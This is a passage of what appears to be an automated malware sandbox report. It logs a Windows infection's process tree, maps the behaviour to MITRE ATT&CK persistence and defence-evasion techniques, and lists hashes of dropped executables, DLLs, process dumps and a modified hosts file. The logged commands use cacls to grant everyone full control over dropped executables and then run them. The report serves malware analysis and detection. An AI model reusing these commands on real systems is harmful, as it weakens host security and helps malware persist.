                                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                                      cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3572
                                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5424
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6068
                                                                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                                                                            cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F
                                                                                                                                                            2⤵
                                                                                                                                                              PID:6056
                                                                                                                                                          • C:\Windows\system32\cmd.EXE
                                                                                                                                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\blifehe.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1960
                                                                                                                                                              • C:\Windows\ime\blifehe.exe
                                                                                                                                                                C:\Windows\ime\blifehe.exe
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:220
                                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5196
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:6688
                                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                                    cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:6152

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                  Execution

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Persistence

                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                  1
                                                                                                                                                                  T1543

                                                                                                                                                                  Windows Service

                                                                                                                                                                  1
                                                                                                                                                                  T1543.003

                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                  1
                                                                                                                                                                  T1547

                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                  1
                                                                                                                                                                  T1547.001

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                  1
                                                                                                                                                                  T1543

                                                                                                                                                                  Windows Service

                                                                                                                                                                  1
                                                                                                                                                                  T1543.003

                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                  1
                                                                                                                                                                  T1547

                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                  1
                                                                                                                                                                  T1547.001

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Defense Evasion

                                                                                                                                                                  Impair Defenses

                                                                                                                                                                  1
                                                                                                                                                                  T1562

                                                                                                                                                                  Disable or Modify System Firewall

                                                                                                                                                                  1
                                                                                                                                                                  T1562.004

                                                                                                                                                                  Modify Registry

                                                                                                                                                                  1
                                                                                                                                                                  T1112

                                                                                                                                                                  Discovery

                                                                                                                                                                  Network Service Discovery

                                                                                                                                                                  2
                                                                                                                                                                  T1046

                                                                                                                                                                  Query Registry

                                                                                                                                                                  1
                                                                                                                                                                  T1012

                                                                                                                                                                  System Information Discovery

                                                                                                                                                                  1
                                                                                                                                                                  T1082

                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                  1
                                                                                                                                                                  T1018

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\Windows\SysWOW64\Packet.dll
                                                                                                                                                                    Filesize

                                                                                                                                                                    95KB

                                                                                                                                                                    MD5

                                                                                                                                                                    86316be34481c1ed5b792169312673fd

                                                                                                                                                                    SHA1

                                                                                                                                                                    6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                                                                                                                    SHA256

                                                                                                                                                                    49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                                                                                                                    SHA512

                                                                                                                                                                    3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                                                                                                                  • C:\Windows\SysWOW64\wpcap.dll
                                                                                                                                                                    Filesize

                                                                                                                                                                    275KB

                                                                                                                                                                    MD5

                                                                                                                                                                    4633b298d57014627831ccac89a2c50b

                                                                                                                                                                    SHA1

                                                                                                                                                                    e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                                                                                                                    SHA256

                                                                                                                                                                    b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                                                                                                                    SHA512

                                                                                                                                                                    29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\1120.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.2MB

                                                                                                                                                                    MD5

                                                                                                                                                                    a366634d5439d3ab10fab60cd0d7599f

                                                                                                                                                                    SHA1

                                                                                                                                                                    252b1f4bdcdd2c889d8102d81f4177c809adb362

                                                                                                                                                                    SHA256

                                                                                                                                                                    bde36171ae3a2d279583e469cae918ac4ad3508c91bde1e7c34c5f684b2ffd8e

                                                                                                                                                                    SHA512

                                                                                                                                                                    277a7894130406de5ebef3e346fb40da5e287cde8de43af2bd70f7c8618136bc94fc67a2b31eb2a62f9173a681c2643c9539badbaa264e08730f01f3e195e6d0

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\1144.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    26.5MB

                                                                                                                                                                    MD5

                                                                                                                                                                    40ea412a4d12d704f6f46e457fd2b283

                                                                                                                                                                    SHA1

                                                                                                                                                                    4fd50d1efff91b8fc8da2898b28deb4154c91819

                                                                                                                                                                    SHA256

                                                                                                                                                                    c986a17b8cd1c3269746049f04c9953d1534c5fc9d9bfd71b3c1a88b66f3d90a

                                                                                                                                                                    SHA512

                                                                                                                                                                    1a2dec2f17457bc377ff17586247223faed737da1dcf236ada5c9585b5fea7e7951c67825cd9537cfdec9dc57ff77c802cb3e87e65327b756cb6bedd6a2e57c1

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\1512.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    4.2MB

                                                                                                                                                                    MD5

                                                                                                                                                                    47425abe9c168b8845fabc4fdc8a674d

                                                                                                                                                                    SHA1

                                                                                                                                                                    c16b3adffbc5ea8e4592a1ac1c98aa3df0938441

                                                                                                                                                                    SHA256

                                                                                                                                                                    ff6e84d1492ba4134323c9ff3d69bf8a014ea318652634145b516be51ed37bb9

                                                                                                                                                                    SHA512

                                                                                                                                                                    5719179b18e18af937c3ae83076e0f2dee8d71e35b0db6b6a5fb5f47a03671e4c1084a6c45ee4f2ff83fc5c01d215c3eac9285a47ec748a5c43141011b6dd484

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\2560.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    4.0MB

                                                                                                                                                                    MD5

                                                                                                                                                                    7cbf29f62308176785993f5b767605f4

                                                                                                                                                                    SHA1

                                                                                                                                                                    b51b39a6551a0527b8c43fc762f5f55746509a35

                                                                                                                                                                    SHA256

                                                                                                                                                                    0d8f7b1b6cfeba9bcec151dee3218bf1bba0da1557e156fca9093a1c5c4d3b73

                                                                                                                                                                    SHA512

                                                                                                                                                                    0f46bbc144ee17254e3a94de6dfe1234cbae363d2d5800052f580d4cd7d416fe8bc5ece54e16cdb98664ca3f35ed7b331cd8399787893c836271cf4de8a96e27

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\2724.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    7730e8cdff29bb00519b091a4c10ae01

                                                                                                                                                                    SHA1

                                                                                                                                                                    9d62ea7501d3fb1b4aac9b2216b00ad82d6cb70c

                                                                                                                                                                    SHA256

                                                                                                                                                                    7877497ea3f0805cb9ea1d27b5f4b0f8a97f4a8040b801401f9cad2d58cc7dbb

                                                                                                                                                                    SHA512

                                                                                                                                                                    d37a15f798f53ee8992e8f437d5186319e5a36de80dcef80e8b11cff3fa0a82c6527ca5406e1bdd8fc5b02ba6cde69747631c36f3a81fbd734b067116051e6d2

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\2764.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.6MB

                                                                                                                                                                    MD5

                                                                                                                                                                    e89187a72f4e2afe83392a784e9ddbcb

                                                                                                                                                                    SHA1

                                                                                                                                                                    bb7c9e4d33d553ef0fcc50b3b7297315bef7d71f

                                                                                                                                                                    SHA256

                                                                                                                                                                    b57ef7d5e1865dbb870bab459a11787306daf689217fb06b094fe79aed97d1f7

                                                                                                                                                                    SHA512

                                                                                                                                                                    12d9a62fe2150741f9d4907e840ebe5c5ea393c67d5318631bac426830228e4997697a5dce9541794869dcc4f7c052a066658291f8cbdcb2b96263a31978f8fb

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\3740.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.3MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6abc7f03aaa80bd3a40b7c87a27d5e4d

                                                                                                                                                                    SHA1

                                                                                                                                                                    dbf14004ae4dce01407c14af232a78faf8156ac8

                                                                                                                                                                    SHA256

                                                                                                                                                                    c4e5a882b55606707580e26447204dcd3d4e7b57386045757f889e1317745e1e

                                                                                                                                                                    SHA512

                                                                                                                                                                    2acb536d914573d3daa228bbcb116f53cfdacaf521482e6641f3fa55608495e20fcd533d5b87833384bd61e91b2d15a52fef3221979212091857dd03635b0f42

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\3828.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    21.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    686dc533fda1f4a8b13e46a9115ee733

                                                                                                                                                                    SHA1

                                                                                                                                                                    c875bd7b51a4b8a733dd19dc4357c40f3ea0c8be

                                                                                                                                                                    SHA256

                                                                                                                                                                    89af1adf6ef207e0572ab62e3b26c9b6e09526600ca82780569af594285f7688

                                                                                                                                                                    SHA512

                                                                                                                                                                    296dc5c5644f9808597030eaf68b9d2e1190310a1e7606c24cab8a7be03a3e40920e0dac44f136d8b337a82fb5efb35fc116ef095755211c47aacb937ea37597

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\3896.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    10.7MB

                                                                                                                                                                    MD5

                                                                                                                                                                    25317932a27d9b04712fb7355b73dd17

                                                                                                                                                                    SHA1

                                                                                                                                                                    6008a4704e39ed03a812b2d5f3975726d4c56030

                                                                                                                                                                    SHA256

                                                                                                                                                                    655c8a5f9fa92d5fea82fd0de941ffbd8938ea0a4f3dcf3f9b920d052e1f2083

                                                                                                                                                                    SHA512

                                                                                                                                                                    2475e43dec5713a3e8b5b99ab1bdd804d3d09e6d605bbb03299535af2091761bf145b59b3869212243fcad87c509d3c3d1a6953f7f00d0068e7c74b154ab04b1

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\3980.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    44.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    bb8270a602b276d2a051096af3039f9d

                                                                                                                                                                    SHA1

                                                                                                                                                                    648076004434e1f542bea393094cd0da7d03e15a

                                                                                                                                                                    SHA256

                                                                                                                                                                    0f42dd8e3e87499d2eb579c702eb16df3e371c8948c54491472313453943f0f7

                                                                                                                                                                    SHA512

                                                                                                                                                                    957078bf21e278b3ef6a033a4960422d45c4a4e1cb08f3d13fea1abc6ad6ef0ded99050fc28e694bac0560d8a19b4cde69b32c0574d401726bbb3fde32dfa5e8

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\4948.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    8.8MB

                                                                                                                                                                    MD5

                                                                                                                                                                    53c746161c7e19bf36ff7502a74002ef

                                                                                                                                                                    SHA1

                                                                                                                                                                    56381597cd1ca19184c31b35bd1ffe253a405743

                                                                                                                                                                    SHA256

                                                                                                                                                                    dcd6f58e9db1e65f8452ef4686cf02e806f16b70175d8a54728d5f8912a8d959

                                                                                                                                                                    SHA512

                                                                                                                                                                    9aa095dee86c5eb1c72d6f6ee247eb3f7363a27ebf191041dee737ca71b52892befcae71099dbecbd4ab17555f147d26ab946cd68120e7723d65226b7f67a355

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\64.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    33.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    bb79c3d019965f81915fc05f43c403fd

                                                                                                                                                                    SHA1

                                                                                                                                                                    5b41627f3c42e68ef13f2328ac92bd3f6990d93a

                                                                                                                                                                    SHA256

                                                                                                                                                                    3ec3c62b951c6c4099848bda88d1e8cbe6201aef8aa236eabadb68674107ac07

                                                                                                                                                                    SHA512

                                                                                                                                                                    48048d509cd25cf6788bb858247b08a9db6058fdce805f7fc4864e8826e4f74fb509614cf70baf7ef3a5c41d1c7a4f16402bba00dbc681870ab2fb70db41875e

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\732.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    818KB

                                                                                                                                                                    MD5

                                                                                                                                                                    f322e2be0ab812edd015b8eea5e10f72

                                                                                                                                                                    SHA1

                                                                                                                                                                    00a6616c773729578f9ce1b6c192cb8c6dd20886

                                                                                                                                                                    SHA256

                                                                                                                                                                    9724a22b3acfdcbc6a45711f2f91d909d77f1fb41edbe7e00d50cfa576d04fd0

                                                                                                                                                                    SHA512

                                                                                                                                                                    58ad0f37bdfbae2cedcd8eabbb88871005b6dbfad83f7522aefdd2def07dc6923a6fc18f04c9cbd966613867ab22cbfe15be2aa8e5d4cb0db0113342154be406

                                                                                                                                                                  • C:\Windows\TEMP\jnrubemey\796.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1019KB

                                                                                                                                                                    MD5

                                                                                                                                                                    7d9cd0c3d9232b8b59567629b0b1cfe4

                                                                                                                                                                    SHA1

                                                                                                                                                                    71e92630e1c38c9e4ae230333a824db6f02710d7

                                                                                                                                                                    SHA256

                                                                                                                                                                    7114e144285a5b0c9e4a6af2a37761c9b64709aea4d7a5c133abab6563bb151d

                                                                                                                                                                    SHA512

                                                                                                                                                                    d6f93a9b16373e9480568fac7bc4f1101c8ae946e7f0f70b8043f806f89278adc4a038ec58baf0febccfbba4e9e1ed64eded3453d031e800a4d8fae95d851758

                                                                                                                                                                  • C:\Windows\TEMP\wvflutbti\config.json
                                                                                                                                                                    Filesize

                                                                                                                                                                    693B

                                                                                                                                                                    MD5

                                                                                                                                                                    f2d396833af4aea7b9afde89593ca56e

                                                                                                                                                                    SHA1

                                                                                                                                                                    08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                                                                                                                    SHA256

                                                                                                                                                                    d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                                                                                                                    SHA512

                                                                                                                                                                    2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                                                                                                                                  • C:\Windows\Temp\jnrubemey\ttliziesz.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    126KB

                                                                                                                                                                    MD5

                                                                                                                                                                    e8d45731654929413d79b3818d6a5011

                                                                                                                                                                    SHA1

                                                                                                                                                                    23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                                                                                                                    SHA256

                                                                                                                                                                    a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                                                                                                                    SHA512

                                                                                                                                                                    df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                                                                                                                  • C:\Windows\Temp\nsf847F.tmp\System.dll
                                                                                                                                                                    Filesize

                                                                                                                                                                    11KB

                                                                                                                                                                    MD5

                                                                                                                                                                    2ae993a2ffec0c137eb51c8832691bcb

                                                                                                                                                                    SHA1

                                                                                                                                                                    98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                                                                                                                    SHA256

                                                                                                                                                                    681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                                                                                                                    SHA512

                                                                                                                                                                    2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                                                                                                                  • C:\Windows\Temp\nsf847F.tmp\nsExec.dll
                                                                                                                                                                    Filesize

                                                                                                                                                                    6KB

                                                                                                                                                                    MD5

                                                                                                                                                                    b648c78981c02c434d6a04d4422a6198

                                                                                                                                                                    SHA1

                                                                                                                                                                    74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                                                                                                                    SHA256

                                                                                                                                                                    3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                                                                                                                    SHA512

                                                                                                                                                                    219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                                                                                                                  • C:\Windows\Temp\wvflutbti\gfiitz.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    343KB

                                                                                                                                                                    MD5

                                                                                                                                                                    2b4ac7b362261cb3f6f9583751708064

                                                                                                                                                                    SHA1

                                                                                                                                                                    b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                                                                                                                    SHA256

                                                                                                                                                                    a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                                                                                                                    SHA512

                                                                                                                                                                    c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                                                                                                                                  • C:\Windows\Temp\xohudmc.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    72KB

                                                                                                                                                                    MD5

                                                                                                                                                                    cbefa7108d0cf4186cdf3a82d6db80cd

                                                                                                                                                                    SHA1

                                                                                                                                                                    73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                                                                                                                    SHA256

                                                                                                                                                                    7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                                                                                                                    SHA512

                                                                                                                                                                    b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                                                                                                                                  • C:\Windows\jnrubemey\Corporate\vfshost.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    381KB

                                                                                                                                                                    MD5

                                                                                                                                                                    fd5efccde59e94eec8bb2735aa577b2b

                                                                                                                                                                    SHA1

                                                                                                                                                                    51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                                                                                                                    SHA256

                                                                                                                                                                    441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                                                                                                                    SHA512

                                                                                                                                                                    74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                                                                                                                  • C:\Windows\jnrubemey\mzinlneik\llbnzpetn.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    332KB

                                                                                                                                                                    MD5

                                                                                                                                                                    ea774c81fe7b5d9708caa278cf3f3c68

                                                                                                                                                                    SHA1

                                                                                                                                                                    fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                                                                                                                    SHA256

                                                                                                                                                                    4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                                                                                                                    SHA512

                                                                                                                                                                    7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                                                                                                                  • C:\Windows\jnrubemey\mzinlneik\wpcap.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    424KB

                                                                                                                                                                    MD5

                                                                                                                                                                    e9c001647c67e12666f27f9984778ad6

                                                                                                                                                                    SHA1

                                                                                                                                                                    51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                                                                                                                    SHA256

                                                                                                                                                                    7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                                                                                                                    SHA512

                                                                                                                                                                    56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                                                                                                                  • C:\Windows\pifhbivn\blifehe.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    9.0MB

                                                                                                                                                                    MD5

                                                                                                                                                                    78bff04b29a468c51b217658e2cfbd30

                                                                                                                                                                    SHA1

                                                                                                                                                                    fb6a4d779679f969b1f412242454a3076a93cfcc

                                                                                                                                                                    SHA256

                                                                                                                                                                    8d53844793883374cd001e747ce69c885aae12e6ed6a1484c95c8fa435c3a74f

                                                                                                                                                                    SHA512

                                                                                                                                                                    25de545c483e0150ad1cb3031cceb1d33351f23179fd993dc9fc43345ded7fce62906d1b11bfd09951bc5d053de7223deac2276fe4e3c76d9bb6c595c9dbee6a

                                                                                                                                                                  • C:\Windows\system32\drivers\etc\hosts
                                                                                                                                                                    Filesize

                                                                                                                                                                    1KB

                                                                                                                                                                    MD5

                                                                                                                                                                    c838e174298c403c2bbdf3cb4bdbb597

                                                                                                                                                                    SHA1

                                                                                                                                                                    70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                                                                                                                    SHA256

                                                                                                                                                                    1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                                                                                                                    SHA512

                                                                                                                                                                    c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                                                                                                                                  • memory/680-0-0x0000000000400000-0x0000000000A9B000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.6MB

                                                                                                                                                                  • memory/744-268-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/1960-219-0x0000000010000000-0x0000000010008000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    32KB

                                                                                                                                                                  • memory/1972-293-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-265-0x0000020981B00000-0x0000020981B04000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/1972-334-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-333-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-255-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-331-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-328-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-241-0x0000020981D20000-0x0000020981D24000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/1972-234-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-240-0x0000020981F40000-0x0000020981F44000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/1972-264-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-299-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-239-0x0000020981B00000-0x0000020981B04000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/1972-238-0x00000209818E0000-0x00000209818E4000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/1972-327-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-326-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-237-0x00000209816C0000-0x00000209816D0000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/1972-276-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/1972-311-0x00007FF735400000-0x00007FF735520000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/2120-287-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/2856-262-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/2912-315-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/3112-291-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/3212-7-0x0000000000400000-0x0000000000A9B000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.6MB

                                                                                                                                                                  • memory/3696-305-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/3948-273-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/3948-271-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/3988-301-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4044-310-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4280-230-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4280-213-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4304-248-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4316-135-0x00007FF721450000-0x00007FF72153E000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    952KB

                                                                                                                                                                  • memory/4316-136-0x00007FF721450000-0x00007FF72153E000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    952KB

                                                                                                                                                                  • memory/4400-296-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4524-252-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4540-325-0x00000000005A0000-0x00000000005B2000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    72KB

                                                                                                                                                                  • memory/4572-277-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4572-279-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
